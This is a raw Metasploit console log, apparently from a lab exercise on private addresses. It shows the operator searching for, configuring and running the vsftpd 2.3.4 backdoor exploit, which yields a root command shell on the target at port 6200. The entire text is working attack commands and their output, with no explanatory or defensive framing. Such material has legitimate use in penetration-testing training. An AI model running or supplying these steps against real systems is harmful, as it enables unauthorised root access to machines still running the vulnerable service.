msf6 > use unix/remote/17491.rb
[-] No results from search
[-] Failed to load module: unix/remote/17491
msf6 > search vsftpd 2.3.4

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options 

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-m
                                       etasploit.html
   RPORT    21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.6.136
rhosts => 192.168.6.136
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.6.136:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.6.136:21 - USER: 331 Please specify the password.
[+] 192.168.6.136:21 - Backdoor service has been spawned, handling...
[+] 192.168.6.136:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
id
ls[*] Command shell session 1 opened (192.168.6.137:32963 -> 192.168.6.136:6200) at 2025-11-12 17:33:34 +0200
